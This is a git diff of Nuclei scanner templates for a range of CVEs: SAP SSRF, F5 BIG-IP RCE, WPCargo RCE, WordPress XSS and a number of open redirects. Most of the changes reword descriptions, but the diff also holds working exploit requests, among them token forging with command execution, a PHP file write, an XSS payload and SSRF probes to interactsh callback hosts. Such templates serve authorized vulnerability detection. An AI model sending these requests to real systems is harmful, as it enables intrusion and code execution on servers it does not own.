description: SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.
description: |
SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.
reference:
- https://github.com/InitRoot/CVE-2020-6308-PoC
- https://launchpad.support.sap.com/#/notes/2943844
@ -14,17 +15,25 @@ info:
cvss-score: 5.3
cve-id: CVE-2020-6308
cwe-id: CWE-918
tags: cve,cve2020,sap,ssrf,oast,blind
tags: cve,cve2020,sap,ssrf,oast,unauth
requests:
- method: POST
path:
- '{{BaseURL}}/AdminTools/querybuilder/logon?framework='
- raw:
- |
POST /AdminTools/querybuilder/logon?framework= HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
aps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: location
words:
- "{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"

12
cves/2020/CVE-2020-8772.yaml
View File

@ -1,19 +1,17 @@
id: CVE-2020-8772
info:
name: WordPress InfiniteWP Client < 1.9.4.5 - Authentication Bypass
name: WordPress InfiniteWP <1.9.4.5 - Authorization Bypass
author: princechaddha,scent2d
severity: critical
description: |
The InfiniteWP Client plugin before 1.9.4.5 for WordPress has a missing
authorization check in iwp_mmb_set_request in init.php. Any attacker who
knows the username of an administrator can log in.
WordPress InfiniteWP plugin before 1.9.4.5 for WordPress contains an authorization bypass vulnerability via a missing authorization check in iwp_mmb_set_request in init.php. An attacker who knows the username of an administrator can log in, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation: Upgrade to InfiniteWP 1.9.4.5 or higher.
reference:
- https://wpscan.com/vulnerability/10011
- https://nvd.nist.gov/vuln/detail/CVE-2020-8772
- https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/
- https://wpvulndb.com/vulnerabilities/10011
remediation: Upgrade to InfiniteWP Client 1.9.4.5 or higher.
- https://nvd.nist.gov/vuln/detail/CVE-2020-8772
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -72,3 +70,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/19

8
cves/2021/CVE-2021-1499.yaml
View File

@ -1,15 +1,15 @@
id: CVE-2021-1499
info:
name: Cisco HyperFlex HX Data Platform - File Upload Vulnerability
name: Cisco HyperFlex HX Data Platform - Arbitrary File Upload
author: gy741
severity: medium
description: A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user.
description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.
reference:
- https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
- https://nvd.nist.gov/vuln/detail/CVE-2021-1499
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz
- http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-1499
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
@ -53,3 +53,5 @@ requests:
- '"filename:'
- '/tmp/passwd9'
condition: and
# Enhanced by md on 2022/10/20

8
cves/2021/CVE-2021-20031.yaml
View File

@ -1,15 +1,15 @@
id: CVE-2021-20031
info:
name: Sonicwall SonicOS 7.0 - Host Header Injection
name: SonicWall SonicOS 7.0 - Open Redirect
author: gy741
severity: medium
description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack
description: SonicWall SonicOS 7.0 contains an open redirect vulnerability. The values of the Host headers are implicitly set as trusted. An attacker can spoof a particular host header, allowing the attacker to render arbitrary links, obtain sensitive information, modify data, execute unauthorized operations. and/or possibly redirect a user to a malicious site.
reference:
- https://www.exploit-db.com/exploits/50414
- https://nvd.nist.gov/vuln/detail/CVE-2021-20031
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019
- http://packetstormsecurity.com/files/164502/Sonicwall-SonicOS-7.0-Host-Header-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-20031
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -37,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/14

8
cves/2021/CVE-2021-22873.yaml
View File

@ -1,15 +1,15 @@
id: CVE-2021-22873
info:
name: Revive Adserver < 5.1.0 Open Redirect
name: Revive Adserver <5.1.0 - Open Redirect
author: pudsec
severity: medium
description: Revive Adserver before 5.1.0 is vulnerable to open redirects via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts.
description: Revive Adserver before 5.1.0 contains an open redirect vulnerability via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-22873
- https://hackerone.com/reports/1081406
- https://github.com/revive-adserver/revive-adserver/issues/1068
- http://seclists.org/fulldisclosure/2021/Jan/60
- https://nvd.nist.gov/vuln/detail/CVE-2021-22873
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -38,3 +38,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/14

9
cves/2021/CVE-2021-22911.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2021-22911
info:
name: RocketChat - NoSQL injection
name: Rocket.Chat <=3.13 - NoSQL Injection
author: tess,sullo
severity: critical
description: Rocket.Chat server versions 3.11, 3.12 and 3.1 allow unauthenticated access to an API endpoint which leads to NoSQL injection in the database.
description: Rocket.Chat 3.11, 3.12 and 3.13 contains a NoSQL injection vulnerability which allows unauthenticated access to an API endpoint. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- http://packetstormsecurity.com/files/162997/Rocket.Chat-3.12.1-NoSQL-Injection-Code-Execution.html
- https://github.com/vulhub/vulhub/tree/master/rocketchat/CVE-2021-22911
- https://hackerone.com/reports/1130721
- https://nvd.nist.gov/vuln/detail/CVE-2021-22911
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22911
- https://blog.sonarsource.com/nosql-injections-in-rocket-chat
- https://nvd.nist.gov/vuln/detail/CVE-2021-22911
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -47,3 +48,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/10/12

14
cves/2021/CVE-2021-22986.yaml
View File

@ -1,19 +1,18 @@
id: CVE-2021-22986
info:
name: F5 BIG-IP iControl REST - Remote Command Execution
name: F5 BIG-IP iControl REST unauthenticated RCE
author: rootxharsh,iamnoooob
severity: critical
description: F5 BIG-IP iControl REST interface is susceptible to an unauthenticated remote command execution vulnerability.
description: The iControl REST interface has an unauthenticated remote command execution vulnerability.
reference:
- https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986
- https://support.f5.com/csp/article/K03009991
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22986
- http://packetstormsecurity.com/files/162059/F5-iControl-Server-Side-Request-Forgery-Remote-Command-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-22986
tags: bigip,cve,cve2021,rce,mirai,kev
tags: bigip,cve,cve2021,rce,kev,packetstorm
requests:
- raw:
@ -24,6 +23,7 @@ requests:
Authorization: Basic YWRtaW46
Content-Type: application/json
Cookie: BIGIPAuthCookie=1234
Connection: close
{"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
- |
@ -32,6 +32,7 @@ requests:
Accept-Language: en
X-F5-Auth-Token: {{token}}
Content-Type: application/json
Connection: close
{"command":"run","utilCmdArgs":"-c id"}
@ -43,7 +44,6 @@ requests:
group: 1
regex:
- "([A-Z0-9]{26})"
- type: regex
part: body
group: 1
@ -56,5 +56,3 @@ requests:
- "commandResult"
- "uid="
condition: and
# Enhanced by mp on 2022/05/05

8
cves/2021/CVE-2021-24165.yaml
View File

@ -1,15 +1,15 @@
id: CVE-2021-24165
info:
name: Ninja Forms < 3.4.34 - Administrator Open Redirect
name: WordPress Ninja Forms <3.4.34 - Open Redirect
author: dhiyaneshDk,daffainfo
severity: medium
description: |
The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place.
WordPress Ninja Forms plugin before 3.4.34 contains an open redirect vulnerability via the wp_ajax_nf_oauth_connect AJAX action, due to the use of a user-supplied redirect parameter and no protection in place. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818
- https://nvd.nist.gov/vuln/detail/CVE-2021-24165
- https://www.wordfence.com/blog/2021/02/one-million-sites-affected-four-severe-vulnerabilities-patched-in-ninja-forms/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24165
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -41,3 +41,5 @@ requests:
- 'status_code_2 == 302'
- "contains(all_headers_2, 'Location: https://interact.sh?client_id=1')"
condition: and
# Enhanced by md on 2022/10/14

10
cves/2021/CVE-2021-24210.yaml
View File

@ -1,17 +1,15 @@
id: CVE-2021-24210
info:
name: PhastPress < 1.111 - Open Redirect
name: WordPress PhastPress <1.111 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
There is an open redirect in the PhastPress WordPress plugin before 1.111 that allows an attacker to malform a request to a page
with the plugin and then redirect the victim to a malicious page. There is also a support comment from another user one year
ago (https://wordpress.org/support/topic/phast-php-used-for-remote-fetch/) that says that the php involved in the request only
go to whitelisted pages but it's possible to redirect the victim to any domain.
WordPress PhastPress plugin before 1.111 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb
- https://plugins.trac.wordpress.org/changeset/2497610/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24210
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -29,3 +27,5 @@ requests:
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
# Enhanced by md on 2022/10/14

2
cves/2021/CVE-2021-24236.yaml
View File

@ -44,10 +44,10 @@ requests:
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="url"
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="checkbox"
yes
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="naam"

8
cves/2021/CVE-2021-24288.yaml
View File

@ -1,13 +1,13 @@
id: CVE-2021-24288
info:
name: AcyMailing < 7.5.0 - Open Redirect
name: WordPress AcyMailing <7.5.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: When using acymailing to subscribe to a newsletter, you make a POST request with various parameters. Turning that to a GET request and adding the parameters as GET parameters, you can successfully
go through with the subscription.
description: WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user.
reference:
- https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97
- https://nvd.nist.gov/vuln/detail/CVE-2021-24288
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -25,3 +25,5 @@ requests:
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
# Enhanced by md on 2022/10/14

7
cves/2021/CVE-2021-24838.yaml
View File

@ -1,13 +1,14 @@
id: CVE-2021-24838
info:
name: AnyComment < 0.3.5 - Open Redirect
name: WordPress AnyComment <0.3.5 - Open Redirect
author: noobexploiter
severity: medium
description: |
The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82
- https://nvd.nist.gov/vuln/detail/CVE-2021-24838
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -34,3 +35,5 @@ requests:
- type: status
status:
- 302
# Enhanced by md on 2022/10/14

7
cves/2021/CVE-2021-24940.yaml
View File

@ -1,11 +1,12 @@
id: CVE-2021-24940
info:
name: Persian Woocommerce < 5.9.8 - Cross-Site Scripting
name: WordPress Persian Woocommerce <=5.8.0 - Cross-Site Scripting
author: daffainfo
severity: medium
description: |
The Persian Woocommerce WordPress plugin through 5.8.0 does not escape the s parameter before outputting it back in an attribute in the admin dashboard, which could lead to a Reflected Cross-Site Scripting issue
WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks.
remediation: Fixed in 5.9.8.
reference:
- https://wpscan.com/vulnerability/1980c5ca-447d-4875-b542-9212cc7ff77f
- https://nvd.nist.gov/vuln/detail/CVE-2021-24940
@ -41,3 +42,5 @@ requests:
- contains(body_2, 'accesskey=X onclick=alert(1) test=')
- contains(body_2, 'woocommerce_persian_translate')
condition: and
# Enhanced by md on 2022/10/17

2
cves/2021/CVE-2021-24997.yaml
View File

@ -18,7 +18,7 @@ info:
tags: wordpress,guppy,api,cve2021,cve,wp-plugin,edb,wpscan
requests:
- method:
- method: GET
path:
- "{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="

51
cves/2021/CVE-2021-25003.yaml Normal file
View File

@ -0,0 +1,51 @@
id: CVE-2021-25003
info:
name: WPCargo < 6.9.0 - Unauthenticated Remote Code Execution
author: theamanrawat
severity: critical
description: |
The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE.
reference:
- https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a
- https://wordpress.org/plugins/wpcargo/
- https://nvd.nist.gov/vuln/detail/CVE-2021-25003
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-25003
cwe-id: CWE-434
metadata:
verified: "true"
tags: rce,wpcargo,unauth,cve,cve2021,wordpress,wp,wp-plugin,wpscan
variables:
num: "999999999"
requests:
- raw:
- |
GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2={{md5(num)}}
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 != 200"
- "status_code_2 == 200"
- "status_code_3 == 200"
- "contains(body_3, md5(num))"
- "contains(body_3, 'PNG')"
condition: and

7
cves/2021/CVE-2021-25111.yaml
View File

@ -1,12 +1,13 @@
id: CVE-2021-25111
info:
name: English WordPress Admin < 1.5.2 - Unauthenticated Open Redirect
name: WordPress English Admin <1.5.2 - Open Redirect
author: akincibor
severity: medium
description: The plugin does not validate the admin_custom_language_return_url before redirecting users o it, leading to an open redirect issue.
description: WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4
- https://nvd.nist.gov/vuln/detail/CVE-2021-25111
tags: cve2021,unauth,wpscan,wp-plugin,redirect,wordpress,wp,cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@ -24,3 +25,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/14

6
cves/2021/CVE-2021-27909.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-27909
info:
name: Mautic - Cross-Site Scripting
name: Mautic <3.3.4 - Cross-Site Scripting
author: kiransau
severity: medium
description: Mautic versions prior to 3.3.4 are vulnerable to reflected XSS on password reset page where a vulnerable parameter, "bundle," in the URL could allow an attacker to execute Javascript code.
description: Mautic before 3.3.4 contains a cross-site scripting vulnerability on the password reset page in the bundle parameter of the URL. An attacker can inject arbitrary script, steal cookie-based authentication credentials, and/or launch other attacks.
reference:
- https://github.com/mautic/mautic/security/advisories/GHSA-32hw-3pvh-vcvc
- https://nvd.nist.gov/vuln/detail/CVE-2021-27909
@ -40,3 +40,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/17

21
cves/2021/CVE-2021-29490.yaml
View File

@ -1,31 +1,36 @@
id: CVE-2021-29490
info:
name: Jellyfin 10.7.2 SSRF
name: Jellyfin 10.7.2 - SSRF
author: alph4byt3
severity: medium
description: Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.
description: |
Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-29490
- https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96
- https://nvd.nist.gov/vuln/detail/CVE-2021-29490
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cve-id: CVE-2021-29490
cwe-id: CWE-918
remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote".
tags: cve,cve2021,ssrf,jellyfin
metadata:
verified: true
shodan-query: http.title:"Jellyfin"
tags: cve,cve2021,ssrf,jellyfin,oast
requests:
- method: GET
path:
- "{{BaseURL}}/Images/Remote?imageUrl=http://{{interactsh-url}}"
- "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=http://{{interactsh-url}}&ProviderName=TheMovieDB"
- "{{BaseURL}}/Images/Remote?imageUrl=http://interact.sh/"
- "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=http://interact.sh/&ProviderName=TheMovieDB"
stop-at-first-match: true
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: body
words:
- "http"
- "<h1> Interactsh Server </h1>"
# Enhanced by cs on 2022/02/25

8
cves/2021/CVE-2021-29622.yaml
View File

@ -1,14 +1,16 @@
id: CVE-2021-29622
info:
name: Prometheus v2.23.0 to v2.26.0, and v2.27.0 Open Redirect
name: Prometheus - Open Redirect
author: geeknik
severity: medium
description: In 2.23.0, Prometheus changed its default UI to the New ui. To ensure a seamless transition, the URL's prefixed by /new redirect to /. Due to a bug in the code, it is possible for an attacker to craft an URL that can redirect to any other URL, in the /new endpoint.
description: Prometheus 2.23.0 through 2.26.0 and 2.27.0 contains an open redirect vulnerability. To ensure a seamless transition to 2.27.0, the default UI was changed to the new UI with a URL prefixed by /new redirect to /. Due to a bug in the code, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation: The issue was patched in the 2.26.1 and 2.27.1 releases. In 2.28.0, the /new endpoint will be removed completely. The workaround is to disable access to /new via a reverse proxy in front of Prometheus.
reference:
- https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7
- https://github.com/prometheus/prometheus/releases/tag/v2.26.1
- https://github.com/prometheus/prometheus/releases/tag/v2.27.1
- https://nvd.nist.gov/vuln/detail/CVE-2021-29622
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -26,3 +28,5 @@ requests:
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
# Enhanced by md on 2022/10/14

10
cves/2021/CVE-2021-32618.yaml
View File

@ -1,12 +1,10 @@
id: CVE-2021-32618
info:
name: Flask Open Redirect
name: Python Flask-Security - Open Redirect
author: 0x_Akoko
severity: medium
description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit
library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com
will pass FS's relative URL check however many browsers will gladly convert this to http://interact.sh.
description: Python Flask-Security contains an open redirect vulnerability. Existing code validates that the URL specified in the next parameter is either relative or has the same network location as the requesting URL. Certain browsers accept and fill in the blanks of possibly incomplete or malformed URLs. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c
- https://github.com/Flask-Middleware/flask-security/issues/486
@ -27,4 +25,6 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/14

64
cves/2021/CVE-2021-33851.yaml Normal file
View File

@ -0,0 +1,64 @@
id: CVE-2021-33851
info:
name: Customize Login Image < 3.5.3 - Cross-Site Scripting
author: 8authur
severity: medium
description: |
A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the "Custom logo link" executes whenever the user opens the Settings Page of the "Customize Login Image" Plugin.
reference:
- https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203
- https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html
- https://wordpress.org/plugins/customize-login-image/
- https://nvd.nist.gov/vuln/detail/cve-2021-33851
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2021-33851
cwe-id: CWE-79
metadata:
verified: "true"
tags: wpscan,cve2021,wordpress,customize-login-image,wp,authenticated,cve,wp-plugin,xss
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
option_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=
- |
GET /wp-login.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_4 == 200'
- 'contains(all_headers_4, "text/html")'
- 'contains(body_4, "Go to <script>alert(document.domain)</script>")'
condition: and
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
internal: true

7
cves/2021/CVE-2021-3654.yaml
View File

@ -1,15 +1,16 @@
id: CVE-2021-3654
info:
name: noVNC Open Redirect
name: Nova noVNC - Open Redirect
author: geeknik
severity: medium
description: A user-controlled input redirects noVNC users to an external website.
description: Nova noVNC contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://seclists.org/oss-sec/2021/q3/188
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654
- https://bugs.python.org/issue32084
- https://opendev.org/openstack/nova/commit/04d48527b62a35d912f93bc75613a6cca606df66
- https://nvd.nist.gov/vuln/detail/CVE-2021-3654
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -34,3 +35,5 @@ requests:
status:
- 302
- 301
# Enhanced by md on 2022/10/14

5
cves/2021/CVE-2021-37704.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-37704
info:
name: phpinfo Resource Exposure
name: phpfastcache - phpinfo Resource Exposure
author: whoever
severity: medium
description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache.
@ -15,7 +15,7 @@ info:
cvss-score: 4.3
cve-id: CVE-2021-37704
cwe-id: CWE-668
tags: cve,cve2021,exposure,phpfastcache,phpinfo
tags: cve,cve2021,exposure,phpfastcache,phpinfo,phpsocialnetwork
requests:
- method: GET
@ -23,6 +23,7 @@ requests:
- "{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php"
- "{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

2
cves/2021/CVE-2021-39327.yaml
View File

@ -14,7 +14,7 @@ info:
cvss-score: 5.3
cve-id: CVE-2021-39327
cwe-id: CWE-200
tags: exposures,packetstorm,cve,cve2021,wordpress
tags: exposure,packetstorm,cve,cve2021,wordpress
requests:
- method: GET

40
cves/2021/CVE-2021-40661.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2021-40661
info:
name: IND780 - Directory Traversal
author: For3stCo1d
severity: high
description: |
